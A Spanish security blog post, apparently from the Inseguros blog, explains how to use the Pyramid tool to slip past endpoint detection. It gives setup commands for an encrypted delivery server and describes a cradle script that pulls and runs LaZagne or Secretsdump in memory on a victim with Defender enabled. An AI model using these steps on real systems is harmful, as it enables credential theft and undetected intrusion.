Si con estos recursos, no le echas un vistazo de vez en cuando a tu entorno, no tienes perdón !!!

Para hacertelo más fácil, en Mayo tenemos un curso presencial-online, ya sabes, te conectas y en directo vemos cosas. 3 días 3 horas. 

En el curso aprenderás muchas herramientas y procesos para ayudarte en la tarea de atacar y defender tu Azure Ad y Microsoft 365.

Si estás ineresado, contacta conmigo !!! el curso es este: https://formacion.seguridadsi.com/courses/seguridadazure0365

Gracias por leerme !!!

Pyramid para bypass de EDR mediante carga dinámica de módulos en Python. Ejemplo Lazagne

 Estimados amigos de Inseguros !!!

En la aventura de hoy vamos a trabajar con una aplicación muy interesante, Pyramid, que desarrolla un concepto de evasión de EDR que me gusta mucho. Aprovechar el beneplácito que pueda tener el binario Python.exe en los distintos motores de detección para "inyectar" comandos de herramientas conocidas en el hacking, como puedan ser Bloodhound, Mimi o Lazagne.

La solución presentada ofrece un servidor web para hacer el "delivery" de los ficheros, cifrados para mejorar la no-detección, un conjunto de módulos que se pueden cargar en memoria, los programas de hacking que queremos ejecutar, y un cliente que ejecutar las instrucciones en nuestro equipo víctima.

Tiene varios módulos, interesantes, Secretsdump de Impacket... una shell, código .net... una maravilla  !!

El proceso de instalación es muy sencillo. 

git clone https://github.com/naksyn/Pyramid

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

python3 pyramid.py -p 443 -ssl -u testuser -pass Sup3rP4ss! -enc "chacha20" -passenc "TestPass1" -server "192.168.1.2" -generate

Con este ejemplo, podemos descargar el cliente con la información ya presentada, un ahorro el no tener que escribirlo :-) Nos bajamos cradle.py

Por defecto el entorno va a ejecutar pyramid_module='mod-bh.py', podemos cambiarlo por ejemplo para usar Lazagne cambiando en cradle.py el modulo por mod-LaZagne.py, o cualquiera de los que trae de casa.

Ejecutamos python cradle.py en la víctima y voila !!

Con defender encendido ejecutamos Lazagne...

Podemos hacer uso de Python Embebido, si el cliente no tiene instalado python 3.10... en su dc xD 

El propio autor nos complace con un post extenso explicando algunos conceptos interesantes de evasión de EDR, en este documento, por si quieres bajar un poquito más.

Gracias por leerme. Recuerda que estamos haciendo cosas chulas en formacion.seguridadsi.com con varios cursos de Ciberseguridad Microsoft, Azure, etc. date una vuelta, hay cursos gratuitos !!! 

El próximo curso presencial-online es el de Seguridad en Azure y O365.